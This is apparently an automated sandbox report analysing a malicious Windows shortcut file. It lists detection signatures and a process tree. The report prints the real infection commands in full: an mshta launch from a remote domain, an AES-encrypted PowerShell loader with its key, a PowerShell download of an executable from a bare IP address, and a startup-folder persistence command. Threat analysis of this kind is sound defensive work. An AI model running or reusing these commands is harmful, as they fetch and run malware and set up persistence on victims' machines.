Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
duyba.lnk.download.lnk

Overview

General Information

Sample name:duyba.lnk.download.lnk
Analysis ID:1577196
MD5:afc9a2ec3804784e238beba0fb861346
SHA1:fcf72ba6b5031b3cde13b6e09480f467bfcde1a0
SHA256:e3b166a6a0bb2f3041367773c47e195224a65e4bc6fb5b8e69a6e2309db055c3
Tags:lnktiffany-careers-comuser-JAMESWT_MHT
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Bypasses PowerShell execution policy
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Powershell drops PE file
Sigma detected: Execution from Suspicious Folder
Sigma detected: Execution of Powershell Script in Public Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows shortcut file (LNK) contains suspicious command line arguments
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • forfiles.exe (PID: 5524 cmdline: "C:\Windows\System32\forfiles.exe" /p C:\Windows\System32 /m cmmon32.exe /c "powershell . \*i*\*2\msh*e https://tiffany-careers.com/ghep2 MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 5972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 984 cmdline: . \*i*\*2\msh*e https://tiffany-careers.com/ghep2 MD5: 04029E121A0CFA5991749937DD22A1D9)
      • mshta.exe (PID: 5060 cmdline: "C:\Windows\System32\mshta.exe" https://tiffany-careers.com/ghep2 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
        • powershell.exe (PID: 4308 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function clean ($RptYb){return -split ($RptYb -replace '..', '0x$& ')};$TmDJyn = clean('85EF51FEE837F812F61F1656D38BD83A6C01DC072CBCF246D841948987B9BF3C9407C4F8ABE6B3AC5C50C036D5BF68E3CA56C456FB1B2404AC5CC6C48224E43EFF1648E7AF29CE17BF2F62A8A7C7F4DE07613F737B271AA100A67B779C122AD966C15CB3C823908B36BCCBE9B592D037365125E56312B004E07F513AA459ACF6BFEB51AC31152191AF94E56667A3D2A99C72466ED1996C430D4FDBDAAC444A645133FFD6F506740CE6AE51237562A4307EAF56A5E569B87DC171D550AD8A419C8822B7E0E8357121B4EE75DD16DB89B145D82B1C909ABECFAF2CA7275A13D2BF9E37AD98257B106D88D6988DB290C39C801B5ACD6E2249F2E178FCF16B59452E1DF6068D3A31595646428A980314EE83988BEB6E930DAD4F3640861D45D0A054E18C6A6A1DC88EC8B63FC99EA26D553E7BB5359CA978A904B26D285DA2E961D2C21E99F57B1C7F312913323B86FA89527AF31A5917C2DA9F587D7AD9CE91B6BF628678DF96FAE7AC81A58B57440B8A9E5A64E9BA96EB65240C98299F091495E74DF32B68B79275E2937AB69BF3BD5F0EC1E9A16BF58DA85A870C384779CDAD74B0CCBA5DB9AC7C88E57A05E5FB4B20E10C6C366F1EB3C39148D6FD619830E132F469D25D555A553DD869B43849F23E017958E14F9380CFE36FC613F285B96CA940C562F0BBE8C241411E58D012E23CE1C600E9337A739DB5AE1933D65A4E4AF946B7B1F6CF268BD58702C1B7772610043D981C68C31564F5D9BCBC8CD96ECCFFEEA53D365D01D36E4B3484C95363DD6F39138A67AA362CC9C4190026ABF641C6DF0E5D4A3DE01E05606278D5D2CD0D85DC89F086FAFB7491F9C40F89ED33F7D31C9484F5A8801EF1BABD7938BE509E2133642C8F35CA6BC2E09BEBD5D6E25F0DC30937B429ECB2F268B5D43052547BFA5B9ED413A38A20627D472EFB0F8E5508505831BA8934BFEEB8AE9A4BF2628245B5EC010BF6D308960A15DD28CFFB2D4FDABA50ADBE760CF86DACFCC1CC10A16D02B0C2946FCEDF74A822836F4B0F4975FF46B0CBA3CB495C20FC2E2D372C357A0897500BE09B0F824AA768EAFC28D39243CF341DE1E2A07E5CBD4B0252080E82D760C61806F6F7994A7DE1DCAB9D55F435A87A935C06EC1E878265F121BBA0C1C3B138C1C358E3620FE1A9D778846E6E0CC25C2E6EF13359D6033DE5B1EE13790F98BE7CD35C3B754897DB4583B2B846BCD4E1906C8F2416336E8F269DA57FC2A9824FD6457D1FBC840D50A0EBE6EA5D36FCDCAEB24318E174CC5E33792642277DCC1EBD38F0C1E9233BA2B6E85C963CD7EA29A78A0D2F2F3C1C85EEA9CB646881CEB314F342ECD05D23D5A754721D804D2562F5FDA471331489B61431D4EB09A03B9EF4D7FB5B3E8091B05427A6364A5B6D0281A41D08DF8F77CE3D19BBEDA721A10EB0619CC5BD0A356D2E124CD2962CE26B9E426500BC09F540E75EBD01524B2439910F6000364849B4B849A10268817BBDBE676C5F3DC1D39FA1F1A09760E6B0902B7C52C8F09DE7BF7015A029559284A573439130DC0912C8C12F8AFD9D26F921AF247BD1AFFBD37E1985F8D2709B4CE2681126C3BE8125DB7B0AB4C0CF4566221DEE6A82BC22EC143820A60C9066D3FDD32C6A78427A2E86463B2B6FFB7F128E906DB4659BDD9607349255B9A7F5362978B75C4A3D8234B1A87F09B3550450D25B8CC317C18849409DC37399F4E365EF0404E3CFE1AB8DBD8A85A9FF698337D674B0E24EFFA058A278F5943622');$MuOQabMc = [System.Security.Cryptography.Aes]::Create();$MuOQabMc.Key = clean('756561544973656A645A7544464B6A70');$MuOQabMc.IV = New-Object byte[] 16;$LaiuJGbhf = $MuOQabMc.CreateDecryptor();$mGnVsuDWp = [Text.Encoding]::UTF8.GetString($LaiuJGbhf.TransformFinalBlock($TmDJyn, 0,$TmDJyn.Length)); & $mGnVsuDWp.Substring(0,3) $mGnVsuDWp.Substring(3) MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 6596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • Acrobat.exe (PID: 6392 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Marketing.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
            • AcroCEF.exe (PID: 6408 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
              • AcroCEF.exe (PID: 4676 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1744,i,5196948583256038124,6281931824865784808,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
          • PefjSkkhb.exe (PID: 7724 cmdline: "C:\Users\user\AppData\Roaming\PefjSkkhb.exe" MD5: 567DE19C0E7E3A1FC845E51AC1C1D5D8)
            • powershell.exe (PID: 7812 cmdline: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"" MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 7836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 7480 cmdline: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 7492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • Guard.exe (PID: 8004 cmdline: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 MD5: 18CE19B57F43CE0A5AF149C96AECC685)
                • cmd.exe (PID: 7496 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                  • conhost.exe (PID: 7856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 5300 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • wscript.exe (PID: 4424 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • SwiftWrite.pif (PID: 4720 cmdline: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G" MD5: 18CE19B57F43CE0A5AF149C96AECC685)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 4308INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x1804e2:$b1: ::WriteAllBytes(
  • 0x180c82:$b1: ::WriteAllBytes(
  • 0xc5ee9:$b3: ::UTF8.GetString(
  • 0xc6ab5:$b3: ::UTF8.GetString(
  • 0xc7885:$b3: ::UTF8.GetString(
  • 0xc90e5:$b3: ::UTF8.GetString(
  • 0xc9e1a:$b3: ::UTF8.GetString(
  • 0xcced8:$b3: ::UTF8.GetString(
  • 0xd0182:$b3: ::UTF8.GetString(
  • 0xd0d31:$b3: ::UTF8.GetString(
  • 0xd5d31:$b3: ::UTF8.GetString(
  • 0xddee5:$b3: ::UTF8.GetString(
  • 0xf0fe7:$b3: ::UTF8.GetString(
  • 0xf1b96:$b3: ::UTF8.GetString(
  • 0x13f25b:$b3: ::UTF8.GetString(
  • 0x13feb4:$b3: ::UTF8.GetString(
  • 0x140a80:$b3: ::UTF8.GetString(
  • 0x157a4d:$b3: ::UTF8.GetString(
  • 0x1585fc:$b3: ::UTF8.GetString(
  • 0x15a3c9:$b3: ::UTF8.GetString(
  • 0x15c3bb:$b3: ::UTF8.GetString(

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , CommandLine: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , CommandLine|base64offset|contains: , Image: C:\Users\Public\Guard.exe, NewProcessName: C:\Users\Public\Guard.exe, OriginalFileName: C:\Users\Public\Guard.exe, ParentCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7480, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , ProcessId: 8004, ProcessName: Guard.exe
Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\PefjSkkhb.exe" , ParentImage: C:\Users\user\AppData\Roaming\PefjSkkhb.exe, ParentProcessId: 7724, ParentProcessName: PefjSkkhb.exe, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ProcessId: 7480, ProcessName: powershell.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, CommandLine: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , ParentImage: C:\Users\Public\Guard.exe, ParentProcessId: 8004, ParentProcessName: Guard.exe, ProcessCommandLine: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, ProcessId: 7496, ProcessName: cmd.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\mshta.exe" https://tiffany-careers.com/ghep2, CommandLine: "C:\Windows\System32\mshta.exe" https://tiffany-careers.com/ghep2, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: . \*i*\*2\msh*e https://tiffany-careers.com/ghep2, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 984, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\mshta.exe" https://tiffany-careers.com/ghep2, ProcessId: 5060, ProcessName: mshta.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\PefjSkkhb.exe" , ParentImage: C:\Users\user\AppData\Roaming\PefjSkkhb.exe, ParentProcessId: 7724, ParentProcessName: PefjSkkhb.exe, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ProcessId: 7480, ProcessName: powershell.exe
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\PefjSkkhb.exe" , ParentImage: C:\Users\user\AppData\Roaming\PefjSkkhb.exe, ParentProcessId: 7724, ParentProcessName: PefjSkkhb.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 7812, ProcessName: powershell.exe
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function clean ($RptYb){return -split ($RptYb -replace '..', '0x$& ')};$TmDJyn = clean('85EF51FEE837F812F61F1656D38BD83A6C01DC072CBCF246D841948987B9BF3C9407C4F8ABE6B3AC5C50C036D5BF68E3CA56C456FB1B2404AC5CC6C48224E43EFF1648E7AF29CE17BF2F62A8A7C7F4DE07613F737B271AA100A67B779C122AD966C15CB3C823908B36BCCBE9B592D037365125E56312B004E07F513AA459ACF6BFEB51AC31152191AF94E56667A3D2A99C72466ED1996C430D4FDBDAAC444A645133FFD6F506740CE6AE51237562A4307EAF56A5E569B87DC171D550AD8A419C8822B7E0E8357121B4EE75DD16DB89B145D82B1C909ABECFAF2CA7275A13D2BF9E37AD98257B106D88D6988DB290C39C801B5ACD6E2249F2E178FCF16B59452E1DF6068D3A31595646428A980314EE83988BEB6E930DAD4F3640861D45D0A054E18C6A6A1DC88EC8B63FC99EA26D553E7BB5359CA978A904B26D285DA2E961D2C21E99F57B1C7F312913323B86FA89527AF31A5917C2DA9F587D7AD9CE91B6BF628678DF96FAE7AC81A58B57440B8A9E5A64E9BA96EB65240C98299F091495E74DF32B68B79275E2937AB69BF3BD5F0EC1E9A16BF58DA85A870C384779CDAD74B0CCBA5DB9AC7C88E57A05E5FB4B20E10C6C366F1EB3C39148D6FD619830E132F469D25D555A553DD869B43849F23E017958E14F9380CFE36FC613F285B96CA940C562F0BBE8C241411E58D012E23CE1C600E9337A739DB5AE1933D65A4E4AF946B7B1F6CF268BD58702C1B7772610043D981C68C31564F5D9BCBC8CD96ECCFFEEA53D365D01D36E4B3484C95363DD6F39138A67AA362CC9C4190026ABF641C6DF0E5D4A3DE01E05606278D5D2CD0D85DC89F086FAFB7491F9C40F89ED33F7D31C9484F5A8801EF1BABD7938BE509E2133642C8F35CA6BC2E09BEBD5D6E25F0DC30937B429ECB2F268B5D43052547BFA5B9ED413A38A20627D472EFB0F8E5508505831BA8934BFEEB8AE9A4BF2628245B5EC010BF6D308960A15DD28CFFB2D4FDABA50ADBE760CF86DACFCC1CC10A16D02B0C2946FCEDF74A822836F4B0F4975FF46B0CBA3CB495C20FC2E2D372C357A0897500BE09B0F824AA768EAFC28D39243CF341DE1E2A07E5CBD4B0252080E82D760C61806F6F7994A7DE1DCAB9D55F435A87A935C06EC1E878265F121BBA0C1C3B138C1C358E3620FE1A9D778846E6E0CC25C2E6EF13359D6033DE5B1EE13790F98BE7CD35C3B754897DB4583B2B846BCD4E1906C8F2416336E8F269DA57FC2A9824FD6457D1FBC840D50A0EBE6EA5D36FCDCAEB24318E174CC5E33792642277DCC1EBD38F0C1E9233BA2B6E85C963CD7EA29A78A0D2F2F3C1C85EEA9CB646881CEB314F342ECD05D23D5A754721D804D2562F5FDA471331489B61431D4EB09A03B9EF4D7FB5B3E8091B05427A6364A5B6D0281A41D08DF8F77CE3D19BBEDA721A10EB0619CC5BD0A356D2E124CD2962CE26B9E426500BC09F540E75EBD01524B2439910F6000364849B4B849A10268817BBDBE676C5F3DC1D39FA1F1A09760E6B0902B7C52C8F09DE7BF7015A029559284A573439130DC0912C8C12F8AFD9D26F921AF247BD1AFFBD37E1985F8D2709B4CE2681126C3BE8125DB7B0AB4C0CF4566221DEE6A82BC22EC143820A60C9066D3FDD32C6A78427A2E86463B2B6FFB7F128E906DB4659BDD9607349255B9A7F5362978B75C4A3D8234B1A87F09B3550450D25B8CC317C18849409DC37399F4E365EF0404E3CFE1AB8DBD8A85A9FF698337D674B0E24EFFA058A278F5943622');$MuOQabMc = [System.Security.Cryptography.Aes]::Create();$MuOQabMc.Key = clean('756561544973656A645A7544464B6A70');$MuOQabMc.IV = New-Object byte[] 16;$LaiuJGbhf = $MuOQabMc.CreateDecryptor();$mGnVsuDWp = [Text.Encoding]::UTF8.GetString($LaiuJGbhf.TransformFinalBlock($TmDJyn, 0,$TmDJyn.Length)); & $mGnVsuDWp.S
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ProcessId: 4424, ProcessName: wscript.exe
Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7812, TargetFilename: C:\Users\Public\Guard.exe
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function clean ($RptYb){return -split ($RptYb -replace '..', '0x$& ')};$TmDJyn = clean('85EF51FEE837F812F61F1656D38BD83A6C01DC072CBCF246D841948987B9BF3C9407C4F8ABE6B3AC5C50C036D5BF68E3CA56C456FB1B2404AC5CC6C48224E43EFF1648E7AF29CE17BF2F62A8A7C7F4DE07613F737B271AA100A67B779C122AD966C15CB3C823908B36BCCBE9B592D037365125E56312B004E07F513AA459ACF6BFEB51AC31152191AF94E56667A3D2A99C72466ED1996C430D4FDBDAAC444A645133FFD6F506740CE6AE51237562A4307EAF56A5E569B87DC171D550AD8A419C8822B7E0E8357121B4EE75DD16DB89B145D82B1C909ABECFAF2CA7275A13D2BF9E37AD98257B106D88D6988DB290C39C801B5ACD6E2249F2E178FCF16B59452E1DF6068D3A31595646428A980314EE83988BEB6E930DAD4F3640861D45D0A054E18C6A6A1DC88EC8B63FC99EA26D553E7BB5359CA978A904B26D285DA2E961D2C21E99F57B1C7F312913323B86FA89527AF31A5917C2DA9F587D7AD9CE91B6BF628678DF96FAE7AC81A58B57440B8A9E5A64E9BA96EB65240C98299F091495E74DF32B68B79275E2937AB69BF3BD5F0EC1E9A16BF58DA85A870C384779CDAD74B0CCBA5DB9AC7C88E57A05E5FB4B20E10C6C366F1EB3C39148D6FD619830E132F469D25D555A553DD869B43849F23E017958E14F9380CFE36FC613F285B96CA940C562F0BBE8C241411E58D012E23CE1C600E9337A739DB5AE1933D65A4E4AF946B7B1F6CF268BD58702C1B7772610043D981C68C31564F5D9BCBC8CD96ECCFFEEA53D365D01D36E4B3484C95363DD6F39138A67AA362CC9C4190026ABF641C6DF0E5D4A3DE01E05606278D5D2CD0D85DC89F086FAFB7491F9C40F89ED33F7D31C9484F5A8801EF1BABD7938BE509E2133642C8F35CA6BC2E09BEBD5D6E25F0DC30937B429ECB2F268B5D43052547BFA5B9ED413A38A20627D472EFB0F8E5508505831BA8934BFEEB8AE9A4BF2628245B5EC010BF6D308960A15DD28CFFB2D4FDABA50ADBE760CF86DACFCC1CC10A16D02B0C2946FCEDF74A822836F4B0F4975FF46B0CBA3CB495C20FC2E2D372C357A0897500BE09B0F824AA768EAFC28D39243CF341DE1E2A07E5CBD4B0252080E82D760C61806F6F7994A7DE1DCAB9D55F435A87A935C06EC1E878265F121BBA0C1C3B138C1C358E3620FE1A9D778846E6E0CC25C2E6EF13359D6033DE5B1EE13790F98BE7CD35C3B754897DB4583B2B846BCD4E1906C8F2416336E8F269DA57FC2A9824FD6457D1FBC840D50A0EBE6EA5D36FCDCAEB24318E174CC5E33792642277DCC1EBD38F0C1E9233BA2B6E85C963CD7EA29A78A0D2F2F3C1C85EEA9CB646881CEB314F342ECD05D23D5A754721D804D2562F5FDA471331489B61431D4EB09A03B9EF4D7FB5B3E8091B05427A6364A5B6D0281A41D08DF8F77CE3D19BBEDA721A10EB0619CC5BD0A356D2E124CD2962CE26B9E426500BC09F540E75EBD01524B2439910F6000364849B4B849A10268817BBDBE676C5F3DC1D39FA1F1A09760E6B0902B7C52C8F09DE7BF7015A029559284A573439130DC0912C8C12F8AFD9D26F921AF247BD1AFFBD37E1985F8D2709B4CE2681126C3BE8125DB7B0AB4C0CF4566221DEE6A82BC22EC143820A60C9066D3FDD32C6A78427A2E86463B2B6FFB7F128E906DB4659BDD9607349255B9A7F5362978B75C4A3D8234B1A87F09B3550450D25B8CC317C18849409DC37399F4E365EF0404E3CFE1AB8DBD8A85A9FF698337D674B0E24EFFA058A278F5943622');$MuOQabMc = [System.Security.Cryptography.Aes]::Create();$MuOQabMc.Key = clean('756561544973656A645A7544464B6A70');$MuOQabMc.IV = New-Object byte[] 16;$LaiuJGbhf = $MuOQabMc.CreateDecryptor();$mGnVsuDWp = [Text.Encoding]::UTF8.GetString($LaiuJGbhf.TransformFinalBlock($TmDJyn, 0,$TmDJyn.Length)); & $mGnVsuDWp.S
Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", CommandLine: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, NewProcessName: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, OriginalFileName: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 4424, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", ProcessId: 4720, ProcessName: SwiftWrite.pif
